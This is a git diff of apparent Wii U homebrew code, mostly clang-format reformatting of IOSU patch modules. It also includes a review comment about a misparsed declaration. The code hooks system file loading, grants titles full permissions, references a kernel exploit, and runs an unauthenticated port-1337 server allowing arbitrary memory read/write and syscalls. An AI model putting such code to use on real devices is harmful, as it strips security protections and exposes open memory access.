+ u32 cnt = message->ioctl.buffer_in[2];
 u64 sector_offset = ((u64) message->ioctl.buffer_in[3] << 32ULL) | message->ioctl.buffer_in[4];
- int deviceHandle = message->ioctl.buffer_in[5];
+ int deviceHandle = message->ioctl.buffer_in[5];
 message->ioctl.buffer_io[0] = FSA_RawRead(fd, ((u8 *) message->ioctl.buffer_io) + 0x40, block_size, cnt, sector_offset, deviceHandle);
 break;
 }
 case IOCTL_FSA_RAW_WRITE: {
- int fd = message->ioctl.buffer_in[0];
- u32 block_size = message->ioctl.buffer_in[1];
- u32 cnt = message->ioctl.buffer_in[2];
+ int fd = message->ioctl.buffer_in[0];
+ u32 block_size = message->ioctl.buffer_in[1];
+ u32 cnt = message->ioctl.buffer_in[2];
 u64 sector_offset = ((u64) message->ioctl.buffer_in[3] << 32ULL) | message->ioctl.buffer_in[4];
- int deviceHandle = message->ioctl.buffer_in[5];
+ int deviceHandle = message->ioctl.buffer_in[5];
 message->ioctl.buffer_io[0] = FSA_RawWrite(fd, ((u8 *) message->ioctl.buffer_in) + 0x40, block_size, cnt, sector_offset, deviceHandle);
 break;
 }
 case IOCTL_FSA_RAW_CLOSE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 int deviceHandle = message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_RawClose(fd, deviceHandle);
 break;
 }
 case IOCTL_FSA_CHANGEMODE: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
- int mode = message->ioctl.buffer_in[2];
+ int mode = message->ioctl.buffer_in[2];
 message->ioctl.buffer_io[0] = FSA_ChangeMode(fd, path, mode);
 break;
 }
 case IOCTL_FSA_FLUSHVOLUME: {
- int fd = message->ioctl.buffer_in[0];
+ int fd = message->ioctl.buffer_in[0];
 char *path = ((char *) message->ioctl.buffer_in) + message->ioctl.buffer_in[1];
 message->ioctl.buffer_io[0] = FSA_FlushVolume(fd, path);
@@ -451,5 +450,4 @@ void ipc_deinit(void) {
 svcIoctl(fd, IOCTL_KILL_SERVER, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
 svcClose(fd);
 }
-
 }
diff --git a/source/ios_mcp/source/ipc_types.h b/source/ios_mcp/source/ipc_types.h
index 46ced18..d89fe05 100644
--- a/source/ios_mcp/source/ipc_types.h
+++ b/source/ios_mcp/source/ipc_types.h
@@ -3,21 +3,21 @@
 #include "types.h"
-#define IOS_COMMAND_INVALID 0x00
-#define IOS_OPEN 0x01
-#define IOS_CLOSE 0x02
-#define IOS_READ 0x03
-#define IOS_WRITE 0x04
-#define IOS_SEEK 0x05
-#define IOS_IOCTL 0x06
-#define IOS_IOCTLV 0x07
-#define IOS_REPLY 0x08
-#define IOS_IPC_MSG0 0x09
-#define IOS_IPC_MSG1 0x0A
-#define IOS_IPC_MSG2 0x0B
-#define IOS_SUSPEND 0x0C
-#define IOS_RESUME 0x0D
-#define IOS_SVCMSG 0x0E
+#define IOS_COMMAND_INVALID 0x00
+#define IOS_OPEN 0x01
+#define IOS_CLOSE 0x02
+#define IOS_READ 0x03
+#define IOS_WRITE 0x04
+#define IOS_SEEK 0x05
+#define IOS_IOCTL 0x06
+#define IOS_IOCTLV 0x07
+#define IOS_REPLY 0x08
+#define IOS_IPC_MSG0 0x09
+#define IOS_IPC_MSG1 0x0A
+#define IOS_IPC_MSG2 0x0B
+#define IOS_SUSPEND 0x0C
+#define IOS_RESUME 0x0D
+#define IOS_SVCMSG 0x0E
 /* IPC message */
diff --git a/source/ios_mcp/source/logger.c b/source/ios_mcp/source/logger.c
index 1574c40..3676009 100644
--- a/source/ios_mcp/source/logger.c
+++ b/source/ios_mcp/source/logger.c
@@ -1,27 +1,26 @@
-#include
-#include
-#include "types.h"
+#include "logger.h"
 #include "imports.h"
 #include "socket.h"
-#include "logger.h"
+#include "types.h"
+#include
+#include
 #ifdef LOG_IP
 static int log_socket = 0;
-int log_init(unsigned int ipAddress){
+int log_init(unsigned int ipAddress) {
 log_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
- if (log_socket < 0){
+ if (log_socket < 0) {
 return log_socket;
 }
 struct sockaddr_in connect_addr;
 memset(&connect_addr, 0, sizeof(connect_addr));
- connect_addr.sin_family = AF_INET;
- connect_addr.sin_port = 4405;
+ connect_addr.sin_family = AF_INET;
+ connect_addr.sin_port = 4405;
 connect_addr.sin_addr.s_addr = ipAddress;
- if(connect(log_socket, (struct sockaddr*)&connect_addr, sizeof(connect_addr)) < 0)
- {
+ if (connect(log_socket, (struct sockaddr *) &connect_addr, sizeof(connect_addr)) < 0) {
 closesocket(log_socket);
 log_socket = -1;
 }
@@ -29,25 +28,22 @@ int log_init(unsigned int ipAddress){
 return log_socket;
 }
-void log_deinit()
-{
- if(log_socket >= 0)
- {
+void log_deinit() {
+ if (log_socket >= 0) {
 closesocket(log_socket);
 log_socket = -1;
 }
 }
-static void log_print(const char *str, int len)
-{
- if(log_socket < 0) {
+static void log_print(const char *str, int len) {
+ if (log_socket < 0) {
 return;
 }
 int ret;
 while (len > 0) {
 int block = len < 1400 ? len : 1400; // take max 1400 bytes per UDP packet
- ret = send(log_socket, str, block, 0);
- if(ret < 0)
+ ret = send(log_socket, str, block, 0);
+ if (ret < 0)
 break;
 len -= ret;
@@ -55,9 +51,8 @@ static void log_print(const char *str, int len)
 }
 }
-void log_printf(const char *format, ...)
-{
- if(log_socket < 0) {
+void log_printf(const char *format, ...) {
+ if (log_socket < 0) {
 return;
 }
diff --git a/source/ios_mcp/source/logger.h b/source/ios_mcp/source/logger.h
index 37e7c05..9286b55 100644
--- a/source/ios_mcp/source/logger.h
+++ b/source/ios_mcp/source/logger.h
@@ -15,8 +15,9 @@ void log_printf(const char *format, ...);
 #define log_printf(x, ...)
 #endif
-#define DEBUG_FUNCTION_LINE(FMT, ARGS...)do { \
- log_printf("[%23s]%30s@L%04d: " FMT "",__FILE__,__FUNCTION__, __LINE__, ## ARGS); \
+#define DEBUG_FUNCTION_LINE(FMT, ARGS...) \
+ do { \
+ log_printf("[%23s]%30s@L%04d: " FMT "", __FILE__, __FUNCTION__, __LINE__, ##ARGS); \
 } while (0)
diff --git a/source/ios_mcp/source/main.c b/source/ios_mcp/source/main.c
index 8a028a7..a4093c6 100644
--- a/source/ios_mcp/source/main.c
+++ b/source/ios_mcp/source/main.c
@@ -1,5 +1,5 @@
-#include "wupserver.h"
 #include "ipc.h"
+#include "wupserver.h"
 static int threadsStarted = 0;
diff --git a/source/ios_mcp/source/mcp_loadfile.c b/source/ios_mcp/source/mcp_loadfile.c
index f3145c6..5affb1a 100644
--- a/source/ios_mcp/source/mcp_loadfile.c
+++ b/source/ios_mcp/source/mcp_loadfile.c
@@ -16,31 +16,31 @@ * - each request routes here where we can do whatever */ -#include "logger.h" -#include "ipc_types.h" #include "../../common/ipc_defs.h" #include "fsa.h" +#include "ipc_types.h" +#include "logger.h" #include "svc.h" #include -int (*const real_MCP_LoadFile)(ipcmessage *msg) = (void *) 0x0501CAA8 + 1; //+1 for thumb +int (*const real_MCP_LoadFile)(ipcmessage *msg) = (void *) 0x0501CAA8 + 1; //+1 for thumb int (*const MCP_DoLoadFile)(const char *path, const char *path2, void *outputBuffer, uint32_t outLength, uint32_t pos, int *bytesRead, uint32_t unk) = (void *) 0x05017248 + 1; static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffset, void *out_buffer, int buffer_len, int pos); -static bool replace_valid = false; -static bool skipPPCSetup = false; -static bool doWantReplaceRPX = false; +static bool replace_valid = false; +static bool skipPPCSetup = false; +static bool doWantReplaceRPX = false; static bool replace_target_device = 0; -static uint32_t rep_filesize = 0; -static uint32_t rep_fileoffset = 0; +static uint32_t rep_filesize = 0; +static uint32_t rep_fileoffset = 0; static char rpxpath[256]; #define log(fmt, ...) log_printf("%s: " fmt, __FUNCTION__, __VA_ARGS__) -#define FAIL_ON(cond, val) \ - if (cond) { \ +#define FAIL_ON(cond, val) \ + if (cond) { \ log(#cond " (%08X)", val); \ - return -29; \ + return -29; \ } int _MCP_LoadFile_patch(ipcmessage *msg) { 
@@ -56,10 +56,10 @@ int _MCP_LoadFile_patch(ipcmessage *msg) {
 //DEBUG_FUNCTION_LINE("msg->ioctl.buffer_io = %p, msg->ioctl.length_io = 0x%X\n", msg->ioctl.buffer_io, msg->ioctl.length_io);
 //DEBUG_FUNCTION_LINE("request->type = %d, request->pos = %d, request->name = \"%s\"\n", request->type, request->pos, request->name);
- int replace_target = replace_target_device;
- int replace_filesize = rep_filesize;
+ int replace_target = replace_target_device;
+ int replace_filesize = rep_filesize;
 int replace_fileoffset = rep_fileoffset;
- char *replace_path = rpxpath;
+ char *replace_path = rpxpath;
 if (strlen(request->name) > 1 && request->name[strlen(request->name) - 1] == 'x') {
 if (strncmp(request->name, "safe.rpx", strlen("safe.rpx")) != 0) {
@@ -81,28 +81,28 @@ int _MCP_LoadFile_patch(ipcmessage *msg) { // The replacement may restart the application to execute a kernel exploit. // The men.rpx is hooked until the "IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED" command is passed to IOCTL 0x100. // If the loading of the replacement file fails, the Wii U Menu is loaded normally. - replace_target = LOAD_FILE_TARGET_SD_CARD; - replace_filesize = 0; // unknown + replace_target = LOAD_FILE_TARGET_SD_CARD; + replace_filesize = 0; // unknown replace_fileoffset = 0; } else if (strncmp(request->name, "safe.rpx", strlen("safe.rpx")) == 0) { // if we don't explicitly replace files, we do want replace the Health and Safety app with the HBL if (request->pos == 0 && !doWantReplaceRPX) { - replace_path = "wiiu/apps/homebrew_launcher/homebrew_launcher.rpx"; + replace_path = "wiiu/apps/homebrew_launcher/homebrew_launcher.rpx"; replace_target = LOAD_FILE_TARGET_SD_CARD; //doWantReplaceXML = false; - doWantReplaceRPX = true; - replace_filesize = 0; // unknown + doWantReplaceRPX = true; + replace_filesize = 0; // unknown replace_fileoffset = 0; } } else if (!doWantReplaceRPX) { doWantReplaceRPX = false; // Only replace it once. - replace_path = NULL; + replace_path = NULL; return real_MCP_LoadFile(msg); } if (replace_path != NULL && strlen(replace_path) > 0) { doWantReplaceRPX = false; // Only replace it once. - int result = MCP_LoadCustomFile(replace_target, replace_path, replace_filesize, replace_fileoffset, msg->ioctl.buffer_io, msg->ioctl.length_io, request->pos); + int result = MCP_LoadCustomFile(replace_target, replace_path, replace_filesize, replace_fileoffset, msg->ioctl.buffer_io, msg->ioctl.length_io, request->pos); if (result >= 0) { return result; 
@@ -126,7 +126,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs
 if (target == LOAD_FILE_TARGET_SD_CARD) {
 char mountpath[] = "/vol/storage_iosu_homebrew";
- int fsa_h = svcOpen("/dev/fsa", 0);
+ int fsa_h = svcOpen("/dev/fsa", 0);
 FSA_Mount(fsa_h, "/dev/sdcard01", mountpath, 2, NULL, 0);
 svcClose(fsa_h);
 strncpy(filepath, mountpath, sizeof(filepath) - 1);
@@ -143,7 +143,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs
 /* TODO: If this fails, try last argument as 1 */
 int bytesRead = 0;
- int result = MCP_DoLoadFile(filepath, NULL, buffer_out, buffer_len, pos + fileoffset, &bytesRead, 0);
+ int result = MCP_DoLoadFile(filepath, NULL, buffer_out, buffer_len, pos + fileoffset, &bytesRead, 0);
 //log("MCP_DoLoadFile returned %d, bytesRead = %d pos %d \n", result, bytesRead, pos + fileoffset);
 if (result >= 0) {
@@ -161,7 +161,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs
 }
 int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlData) {
- int (*const real_MCP_ReadCOSXml_patch)(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlData) = (void *) 0x050024ec + 1; //+1 for thumb
+ int (*const real_MCP_ReadCOSXml_patch)(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo * xmlData) = (void *) 0x050024ec + 1; //+1 for thumb
 int res = real_MCP_ReadCOSXml_patch(u1, u2, xmlData);
@@ -173,7 +173,7 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat
 if (xmlData->titleId != 0x000500001010DC00 && // Mass Effect 3 Special Edition USA
 xmlData->titleId != 0x000500001010F500 && // Mass Effect 3 Special Edition EUR
 xmlData->titleId != 0x0005000010113000) { // Mass Effect 3 Special Edition JPN
-
+
 // Give all titles permission to use ACP
 xmlData->permissions[10].mask = 0xFFFFFFFFFFFFFFFF;
 }
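Review bot: In the `@@ -161,7 +161,7 @@` hunk clang-format rewrote the function-pointer parameter as `MCPPPrepareTitleInfo * xmlData`, treating the project type as the left operand of a multiplication; the declaration is unchanged semantically, but it now reads as an expression and the same misparse will recur on every reformat. Give the formatter a name it can resolve with a typedef, e.g. `typedef int (*MCP_ReadCOSXml_fn)(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlData);` followed by `MCP_ReadCOSXml_fn real_MCP_ReadCOSXml_patch = (void *) 0x050024ec + 1; //+1 for thumb`, or wrap the line in `// clang-format off` / `// clang-format on`. The body of _MCP_ReadCOSXml_patch continues outside this hunk.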
@@ -185,11 +185,11 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat xmlData->titleId == 0x000500101004E200) { xmlData->codegen_size = 0x02000000; xmlData->codegen_core = 0x80000001; - xmlData->max_size = 0x40000000; + xmlData->max_size = 0x40000000; // Set maximum codesize to 64 MiB - xmlData->max_codesize = 0x04000000; - xmlData->avail_size = 0; + xmlData->max_codesize = 0x04000000; + xmlData->avail_size = 0; xmlData->overlay_arena = 0; // Give us full permissions everywhere @@ -197,9 +197,9 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat xmlData->permissions[i].mask = 0xFFFFFFFFFFFFFFFF; } - xmlData->default_stack0_size = 0; - xmlData->default_stack1_size = 0; - xmlData->default_stack2_size = 0; + xmlData->default_stack0_size = 0; + xmlData->default_stack1_size = 0; + xmlData->default_stack2_size = 0; xmlData->default_redzone0_size = 0; xmlData->default_redzone1_size = 0; xmlData->default_redzone2_size = 0; @@ -260,16 +260,16 @@ int _MCP_ioctl100_patch(ipcmessage *msg) { DEBUG_FUNCTION_LINE("IPC_CUSTOM_LOAD_CUSTOM_RPX\n"); if (msg->ioctl.length_in >= 0x110) { - int target = msg->ioctl.buffer_in[0x04 / 0x04]; - int filesize = msg->ioctl.buffer_in[0x08 / 0x04]; + int target = msg->ioctl.buffer_in[0x04 / 0x04]; + int filesize = msg->ioctl.buffer_in[0x08 / 0x04]; int fileoffset = msg->ioctl.buffer_in[0x0C / 0x04]; - char *str_ptr = (char *) &msg->ioctl.buffer_in[0x10 / 0x04]; + char *str_ptr = (char *) &msg->ioctl.buffer_in[0x10 / 0x04]; memset(rpxpath, 0, sizeof(rpxpath)); strncpy(rpxpath, str_ptr, 256 - 1); - rep_filesize = filesize; - rep_fileoffset = fileoffset; + rep_filesize = filesize; + rep_fileoffset = fileoffset; doWantReplaceRPX = true; //doWantReplaceXML = true; replace_valid = true; 
@@ -309,8 +309,8 @@ int _MCP_ioctl100_patch(ipcmessage *msg) {
 // Kill existing syslogs to avoid long catch up
 uint32_t *bufferPtr = (uint32_t *) (*(uint32_t *) 0x05095ecc);
- bufferPtr[0] = 0;
- bufferPtr[1] = 0;
+ bufferPtr[0] = 0;
+ bufferPtr[1] = 0;
 break;
 }
diff --git a/source/ios_mcp/source/net_ifmgr_ncl.c b/source/ios_mcp/source/net_ifmgr_ncl.c
index 95074ea..8571add 100644
--- a/source/ios_mcp/source/net_ifmgr_ncl.c
+++ b/source/ios_mcp/source/net_ifmgr_ncl.c
@@ -1,8 +1,8 @@
-#include
-#include
 #include "net_ifmgr_ncl.h"
 #include "imports.h"
 #include "svc.h"
+#include
+#include
 static int ifmgrncl_handle = 0;
@@ -40,9 +40,9 @@ static void freeIobuf(void *ptr) {
 }
 int IFMGRNCL_GetInterfaceStatus(u16 interface_id, u16 *out_status) {
- u8 *iobuf1 = allocIobuf(0x2);
- u16 *inbuf = (u16 *) iobuf1;
- u8 *iobuf2 = allocIobuf(0x8);
+ u8 *iobuf1 = allocIobuf(0x2);
+ u16 *inbuf = (u16 *) iobuf1;
+ u8 *iobuf2 = allocIobuf(0x8);
 u16 *outbuf = (u16 *) iobuf2;
 inbuf[0] = interface_id;
diff --git a/source/ios_mcp/source/socket.c b/source/ios_mcp/source/socket.c
index 8dae5f8..15ed892 100644
--- a/source/ios_mcp/source/socket.c
+++ b/source/ios_mcp/source/socket.c
@@ -1,9 +1,9 @@
-#include
-#include
-#include
 #include "socket.h"
-#include "svc.h"
 #include "imports.h"
+#include "svc.h"
+#include
+#include
+#include
 static int socket_handle = 0;
@@ -41,7 +41,7 @@ static void freeIobuf(void *ptr) {
 }
 int socket(int domain, int type, int protocol) {
- u8 *iobuf = allocIobuf(0xC);
+ u8 *iobuf = allocIobuf(0xC);
 u32 *inbuf = (u32 *) iobuf;
 inbuf[0] = domain;
@@ -55,7 +55,7 @@ int socket(int domain, int type, int protocol) {
 }
 int closesocket(int sockfd) {
- u8 *iobuf = allocIobuf(0x4);
+ u8 *iobuf = allocIobuf(0x4);
 u32 *inbuf = (u32 *) iobuf;
 inbuf[0] = sockfd;
@@ -67,8 +67,8 @@ int closesocket(int sockfd) { } int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) { - u8 *iobuf = allocIobuf(0x18); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(0x18); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) inbuf; inbuf[0] = sockfd; @@ -97,7 +97,7 @@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) { int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { if (addrlen != 0x10) return -1; - u8 *iobuf = allocIobuf(0x18); + u8 *iobuf = allocIobuf(0x18); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -113,7 +113,7 @@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { if (addrlen != 0x10) return -1; - u8 *iobuf = allocIobuf(0x18); + u8 *iobuf = allocIobuf(0x18); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -127,7 +127,7 @@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { } int listen(int sockfd, int backlog) { - u8 *iobuf = allocIobuf(0x8); + u8 *iobuf = allocIobuf(0x8); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -140,7 +140,7 @@ int listen(int sockfd, int backlog) { } int shutdown(int sockfd, int how) { - u8 *iobuf = allocIobuf(0x8); + u8 *iobuf = allocIobuf(0x8); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -159,9 +159,9 @@ int recv(int sockfd, void *buf, size_t len, int flags) { void *data_buf = svcAllocAlign(0xCAFF, len, 0x40); if (!data_buf) return -100; - u8 *iobuf = allocIobuf(0x38); + u8 *iobuf = allocIobuf(0x38); iovec_s *iovec = (iovec_s *) iobuf; - u32 *inbuf = (u32 *) &iobuf[0x30]; + u32 *inbuf = (u32 *) &iobuf[0x30]; inbuf[0] = sockfd; inbuf[1] = flags; 
@@ -189,9 +189,9 @@ int send(int sockfd, const void *buf, size_t len, int flags) { void *data_buf = svcAllocAlign(0xCAFF, len, 0x40); if (!data_buf) return -100; - u8 *iobuf = allocIobuf(0x38); + u8 *iobuf = allocIobuf(0x38); iovec_s *iovec = (iovec_s *) iobuf; - u32 *inbuf = (u32 *) &iobuf[0x30]; + u32 *inbuf = (u32 *) &iobuf[0x30]; memcpy(data_buf, buf, len); diff --git a/source/ios_mcp/source/socket.h b/source/ios_mcp/source/socket.h index f02e5bb..0178988 100644 --- a/source/ios_mcp/source/socket.h +++ b/source/ios_mcp/source/socket.h 
@@ -5,70 +5,70 @@ #include #include -#define SOL_SOCKET 0xFFFF +#define SOL_SOCKET 0xFFFF -#define PF_UNSPEC 0 -#define PF_INET 2 -#define PF_INET6 10 +#define PF_UNSPEC 0 +#define PF_INET 2 +#define PF_INET6 10 -#define AF_UNSPEC PF_UNSPEC -#define AF_INET PF_INET -#define AF_INET6 PF_INET6 +#define AF_UNSPEC PF_UNSPEC +#define AF_INET PF_INET +#define AF_INET6 PF_INET6 -#define SOCK_STREAM 1 -#define SOCK_DGRAM 2 +#define SOCK_STREAM 1 +#define SOCK_DGRAM 2 -#define MSG_CTRUNC 0x01000000 -#define MSG_DONTROUTE 0x02000000 -#define MSG_EOR 0x04000000 -#define MSG_OOB 0x08000000 -#define MSG_PEEK 0x10000000 -#define MSG_TRUNC 0x20000000 -#define MSG_WAITALL 0x40000000 +#define MSG_CTRUNC 0x01000000 +#define MSG_DONTROUTE 0x02000000 +#define MSG_EOR 0x04000000 +#define MSG_OOB 0x08000000 +#define MSG_PEEK 0x10000000 +#define MSG_TRUNC 0x20000000 +#define MSG_WAITALL 0x40000000 -#define SHUT_RD 0 -#define SHUT_WR 1 -#define SHUT_RDWR 2 +#define SHUT_RD 0 +#define SHUT_WR 1 +#define SHUT_RDWR 2 -#define SO_DEBUG 0x0001 -#define SO_ACCEPTCONN 0x0002 -#define SO_REUSEADDR 0x0004 -#define SO_KEEPALIVE 0x0008 -#define SO_DONTROUTE 0x0010 -#define SO_BROADCAST 0x0020 -#define SO_USELOOPBACK 0x0040 -#define SO_LINGER 0x0080 -#define SO_OOBINLINE 0x0100 -#define SO_REUSEPORT 0x0200 -#define SO_SNDBUF 0x1001 -#define SO_RCVBUF 0x1002 -#define SO_SNDLOWAT 0x1003 -#define SO_RCVLOWAT 0x1004 -#define SO_SNDTIMEO 0x1005 -#define SO_RCVTIMEO 0x1006 -#define SO_ERROR 0x1007 -#define SO_TYPE 0x1008 +#define SO_DEBUG 0x0001 +#define SO_ACCEPTCONN 0x0002 +#define SO_REUSEADDR 0x0004 +#define SO_KEEPALIVE 0x0008 +#define SO_DONTROUTE 0x0010 +#define SO_BROADCAST 0x0020 +#define SO_USELOOPBACK 0x0040 +#define SO_LINGER 0x0080 +#define SO_OOBINLINE 0x0100 +#define SO_REUSEPORT 0x0200 +#define SO_SNDBUF 0x1001 +#define SO_RCVBUF 0x1002 +#define SO_SNDLOWAT 0x1003 +#define SO_RCVLOWAT 0x1004 +#define SO_SNDTIMEO 0x1005 +#define SO_RCVTIMEO 0x1006 +#define SO_ERROR 0x1007 +#define SO_TYPE 
0x1008 -#define INADDR_ANY 0x00000000 -#define INADDR_BROADCAST 0xFFFFFFFF +#define INADDR_ANY 0x00000000 +#define INADDR_BROADCAST 0xFFFFFFFF #define INADDR_NONE 0xFFFFFFFF -#define INET_ADDRSTRLEN 16 +#define INET_ADDRSTRLEN 16 -#define INADDR_LOOPBACK 0x7f000001 -#define INADDR_ANY 0x00000000 -#define INADDR_BROADCAST 0xFFFFFFFF -#define INADDR_NONE 0xFFFFFFFF +#define INADDR_LOOPBACK 0x7f000001 +#define INADDR_ANY 0x00000000 +#define INADDR_BROADCAST 0xFFFFFFFF +#define INADDR_NONE 0xFFFFFFFF -#define INET_ADDRSTRLEN 16 +#define INET_ADDRSTRLEN 16 -#define IPPROTO_IP 0 /* dummy for IP */ -#define IPPROTO_UDP 17 /* user datagram protocol */ -#define IPPROTO_TCP 6 /* tcp */ +#define IPPROTO_IP 0 /* dummy for IP */ +#define IPPROTO_UDP 17 /* user datagram protocol */ +#define IPPROTO_TCP 6 /* tcp */ -#define IP_TOS 7 -#define IP_TTL 8 -#define IP_MULTICAST_LOOP 9 +#define IP_TOS 7 +#define IP_TTL 8 +#define IP_MULTICAST_LOOP 9 #define IP_MULTICAST_TTL 10 #define IP_ADD_MEMBERSHIP 11 #define IP_DROP_MEMBERSHIP 12 diff --git a/source/ios_mcp/source/types.h b/source/ios_mcp/source/types.h index 7b77e8a..4424d9d 100644 --- a/source/ios_mcp/source/types.h +++ b/source/ios_mcp/source/types.h @@ -1,10 +1,10 @@ #ifndef TYPES_H #define TYPES_H -#include #include +#include -#define U64_MAX UINT64_MAX +#define U64_MAX UINT64_MAX typedef uint8_t u8; typedef uint16_t u16; diff --git a/source/ios_mcp/source/wupserver.c b/source/ios_mcp/source/wupserver.c index bbb6762..2d27ae5 100644 --- a/source/ios_mcp/source/wupserver.c +++ b/source/ios_mcp/source/wupserver.c @@ -1,13 +1,13 @@ -#include -#include -#include +#include "fsa.h" #include "imports.h" +#include "ipc.h" +#include "logger.h" #include "net_ifmgr_ncl.h" #include "socket.h" -#include "fsa.h" #include "svc.h" -#include "logger.h" -#include "ipc.h" +#include +#include +#include static int serverKilled; static int serverSocket; 
@@ -24,84 +24,84 @@ static int serverCommandHandler(u32 *command_buffer, u32 length) { case 0: // write // [cmd_id][addr] - { - void *dst = (void *) command_buffer[1]; + { + void *dst = (void *) command_buffer[1]; - memcpy(dst, &command_buffer[2], length - 8); - } + memcpy(dst, &command_buffer[2], length - 8); + } break; case 1: // read // [cmd_id][addr][length] - { - void *src = (void *) command_buffer[1]; - length = command_buffer[2]; + { + void *src = (void *) command_buffer[1]; + length = command_buffer[2]; - memcpy(&command_buffer[1], src, length); - out_length = length + 4; - } + memcpy(&command_buffer[1], src, length); + out_length = length + 4; + } break; case 2: // svc // [cmd_id][svc_id] - { - int svc_id = command_buffer[1]; - int size_arguments = length - 8; + { + int svc_id = command_buffer[1]; + int size_arguments = length - 8; - u32 arguments[8]; - memset(arguments, 0x00, sizeof(arguments)); - memcpy(arguments, &command_buffer[2], (size_arguments < 8 * 4) ? size_arguments : (8 * 4)); + u32 arguments[8]; + memset(arguments, 0x00, sizeof(arguments)); + memcpy(arguments, &command_buffer[2], (size_arguments < 8 * 4) ? 
size_arguments : (8 * 4)); - // return error code as data - out_length = 8; - command_buffer[1] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32)) (MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], arguments[5], - arguments[6], arguments[7]); - } + // return error code as data + out_length = 8; + command_buffer[1] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32))(MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], arguments[5], + arguments[6], arguments[7]); + } break; case 3: // kill // [cmd_id] - { - serverKilled = 1; - ipc_deinit(); - } + { + serverKilled = 1; + ipc_deinit(); + } break; case 4: // memcpy // [dst][src][size] - { - void *dst = (void *) command_buffer[1]; - void *src = (void *) command_buffer[2]; - int size = command_buffer[3]; + { + void *dst = (void *) command_buffer[1]; + void *src = (void *) command_buffer[2]; + int size = command_buffer[3]; - memcpy(dst, src, size); - } + memcpy(dst, src, size); + } break; case 5: // repeated-write // [address][value][n] - { - u32 *dst = (u32 *) command_buffer[1]; - u32 *cache_range = (u32 *) (command_buffer[1] & ~0xFF); - u32 value = command_buffer[2]; - u32 n = command_buffer[3]; + { + u32 *dst = (u32 *) command_buffer[1]; + u32 *cache_range = (u32 *) (command_buffer[1] & ~0xFF); + u32 value = command_buffer[2]; + u32 n = command_buffer[3]; - u32 old = *dst; - int i; - for (i = 0; i < n; i++) { - if (*dst != old) { - if (*dst == 0x0) old = *dst; - else { - *dst = value; - svcFlushDCache(cache_range, 0x100); - break; + u32 old = *dst; + int i; + for (i = 0; i < n; i++) { + if (*dst != old) { + if (*dst == 0x0) old = *dst; + else { + *dst = value; + svcFlushDCache(cache_range, 0x100); + break; + } + } else { + svcInvalidateDCache(cache_range, 0x100); + usleep(50); } - } else { - svcInvalidateDCache(cache_range, 0x100); - usleep(50); } } - } break; default: // unknown command 
@@ -141,8 +141,8 @@ static void serverListenClients() { memset(&server, 0x00, sizeof(server)); - server.sin_family = AF_INET; - server.sin_port = 1337; + server.sin_family = AF_INET; + server.sin_port = 1337; server.sin_addr.s_addr = 0; if (bind(serverSocket, (struct sockaddr *) &server, sizeof(server)) < 0) { diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c index 9619110..0229ea6 100644 --- a/source/ios_usb/source/main.c +++ b/source/ios_usb/source/main.c @@ -5,7 +5,7 @@ void _main() { int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04; int saved_handle = *(volatile int *) 0x0012F000; - int myret = reply(saved_handle, 0); + int myret = reply(saved_handle, 0); if (myret != 0) ios_shutdown(1); @@ -19,6 +19,4 @@ void _main() { "newlr: .word 0x1012EACC\n" "newr0: .word 0x10146080\n" "newpc: .word 0x10111164\n"); - - } diff --git a/source/main.cpp b/source/main.cpp index 6b3680b..ed6ffa6 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -1,7 +1,7 @@ -#include -#include #include #include +#include +#include #include #include @@ -30,11 +30,11 @@ int main(int argc, char **argv) { // When the kernel exploit is set up successfully, we signal the ios to move on. int mcpFd = IOS_Open("/dev/mcp", (IOSOpenMode) 0); if (mcpFd >= 0) { - int in = IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED; + int in = IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED; int out = 0; IOS_Ioctl(mcpFd, 100, &in, sizeof(in), &out, sizeof(out)); - in = IPC_CUSTOM_START_MCP_THREAD; + in = IPC_CUSTOM_START_MCP_THREAD; out = 0; IOS_Ioctl(mcpFd, 100, &in, sizeof(in), &out, sizeof(out)); IOS_Close(mcpFd);